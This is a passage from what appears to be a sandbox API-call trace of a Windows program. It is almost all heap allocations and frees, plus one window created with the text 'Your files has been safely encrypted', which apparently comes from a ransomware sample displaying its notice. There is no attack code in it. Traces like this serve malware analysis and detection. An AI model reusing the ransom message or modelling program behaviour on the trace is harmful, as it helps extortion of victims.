returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67c70 | out: hHeap=0xbe0000) returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.540] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a60 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8aa8 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53340 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8aa8 | out: hHeap=0xbe0000) returned 1 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe67c70 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53320 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532f0 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d850 [0248.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8aa8 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53310 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8aa8 | out: hHeap=0xbe0000) returned 1 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d850 | out: hHeap=0xbe0000) returned 1 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8aa8 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8be0 | out: hHeap=0xbe0000) returned 1 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532f0 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0248.541] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8910 [0248.541] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8910 | out: hHeap=0xbe0000) returned 1 [0248.542] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d850 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8be0 | out: hHeap=0xbe0000) returned 1 [0248.542] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.542] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53310 [0248.542] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53300 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.542] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53310 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.542] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53300 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01658 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf64c8 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6498 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53350 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89e8 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89d0 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89a0 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89b8 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe61b90 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c88 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d558 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41e8 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d580 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d490 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6648 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bb0 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08928 | out: hHeap=0xbe0000) returned 1 [0248.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b98 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b80 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d788 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7d8 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6408 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bc8 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66a8 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7b0 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a60 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d800 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52840 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xea2ce0 [0248.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.544] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53340 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.545] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53340 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53380 [0248.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x70) returned 0xdffa58 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) returned 1 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.545] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.545] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0248.546] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01610 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4170 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe51328 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52760 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5f8 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4128 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe51280 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3f0 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4098 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe512b8 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526b0 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d440 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdffa58 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4248 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4200 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d4b8 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5a8 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4158 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe512f0 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d468 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8aa8 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d850 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67c70 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xea2ce0 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d800 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52840 [0248.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.547] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52700 [0248.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52840 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52840 [0248.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52840 [0248.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8aa8 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52840 [0248.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4158 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52840 [0248.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4a) returned 0xdec200 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa0) returned 0xe5d130 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4200 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52840 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4248 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4098 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53320 [0248.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.548] CreateWindowExW (dwExStyle=0x0, lpClassName="static", lpWindowName="Your files has been safely encrypted", dwStyle=0x50000100, X=16, Y=8, nWidth=600, nHeight=42, hWndParent=0x30150, hMenu=0x5, hInstance=0x290000, lpParam=0x0) returned 0x2016a [0248.549] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.549] NtdllDialogWndProc_W () returned 0x0 [0248.549] GetStockObject (i=17) returned 0x18a0025 [0248.549] SendMessageW (hWnd=0x2016a, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0248.549] GetSysColor (nIndex=18) returned 0x0 [0248.549] GetClientRect (in: hWnd=0x2016a, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.549] GetWindowRect (in: hWnd=0x2016a, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.549] SetWindowLongW (hWnd=0x2016a, nIndex=-21, dwNewLong=5) returned 0 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdec200 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8aa8 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4158 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d800 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4158 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52700 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8aa8 [0248.550] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d850 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.550] 